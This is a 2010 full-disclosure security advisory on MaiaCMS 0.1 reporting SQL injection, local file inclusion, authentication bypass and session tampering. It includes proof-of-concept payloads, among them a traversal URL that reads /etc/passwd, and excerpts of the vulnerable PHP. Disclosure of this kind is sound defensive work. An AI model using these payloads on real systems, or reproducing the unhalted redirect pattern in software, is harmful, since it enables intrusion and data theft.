JAHx103 - Multiple vulnerabilities in maiacms

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages has a check and redirect to login snippet to validate login:
list_pages.php:1:<?php
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:3:    
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the the aforementioned access control weakness and allows the session data to be changed or created directly through a HTTP POST operation.
update_session.php:1:<?php
update_session.php:2:require_once("../includes/connections.php");
update_session.php:3:
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:7:    
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;
update_session.php:10:}
update_session.php:11:
update_session.php:12:$db->Close();
update_session.php:13:?>

--- Solution ---
Wait for the next or non alpha release

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.